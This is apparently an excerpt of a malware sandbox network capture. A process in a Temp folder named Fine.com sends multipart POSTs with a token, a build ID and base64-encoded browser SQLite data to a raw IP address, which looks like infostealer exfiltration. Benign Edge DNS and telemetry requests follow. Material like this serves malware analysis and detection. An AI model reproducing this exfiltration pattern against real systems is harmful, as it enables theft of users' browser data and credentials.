                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:12 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                                                          Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:13 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          27192.168.2.550074195.201.141.1064431440C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC185OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----VKNG4E3OZMOZUAAASJ5P
                                                                                                                                                                                                                                                                                                                          Host: 195.201.141.106
                                                                                                                                                                                                                                                                                                                          Content-Length: 262605
                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 66 62 31 62 30 37 30 65 35 33 32 61 39 65 63 38 34 64 65 37 35 66 61 34 35 30 35 34 37 63 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 31 64 34 63 63 38 35 35 64 64 36 66 36 33 35 30 61 31 65 61 64 66 36 37 32 30 61 64 31 63 66 0d 0a 2d 2d 2d 2d 2d 2d 56 4b 4e 47 34 45 33 4f 5a 4d 4f 5a 55 41 41 41 53 4a 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                          Data Ascii: ------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="token"effb1b070e532a9ec84de75fa450547c------VKNG4E3OZMOZUAAASJ5PContent-Disposition: form-data; name="build_id"a1d4cc855dd6f6350a1eadf6720ad1cf------VKNG4E3OZMOZUAAASJ5PCont
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                                                          Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:13 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:15 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          28192.168.2.550076162.159.61.34437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:14 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                          CF-RAY: 900e7d6a8bac41d3-EWR
                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 05 43 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 01 2c 00 29 0f 70 72 6f 64 2d 61 67 69 63 2d 65 75 32 2d 34 07 65 61 73 74 75 73 32 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 83 00 06 00 01 00 00 00 3c 00 30 06 6e 73 31 2d 30 36 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 f1 00 0c 00 ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcomAC&prod-atm-wds-edgetrafficmanagernetA,)prod-agic-eu2-4eastus2cloudappazure,<0ns1-06azure-dns,msnhst"',:<)


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          29192.168.2.550077162.159.61.34437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcom)@<
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                          Date: Sun, 12 Jan 2025 16:23:14 GMT
                                                                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                                                                          CF-RAY: 900e7d6a7dce43f7-EWR
                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC468INData Raw: 00 00 81 80 00 01 00 03 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0b c0 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 00 09 00 27 0e 70 72 6f 64 2d 61 67 69 63 2d 77 75 2d 31 06 77 65 73 74 75 73 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 73 00 01 00 01 00 00 00 0a 00 04 0d 5b 60 b9 00 00 29 04 d0 00 00 00 00 01 1f 00 0c 01 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                          Data Ascii: data-edgesmartscreenmicrosoftcom&prod-atm-wds-edgetrafficmanagernetA'prod-agic-wu-1westuscloudappazure,s[`)


                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                          30192.168.2.55007918.238.49.994437340C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                          2025-01-12 16:23:14 UTC925OUTGET /b?rn=1736698992883&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0DA5835E35016A581E46962C34736B24&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
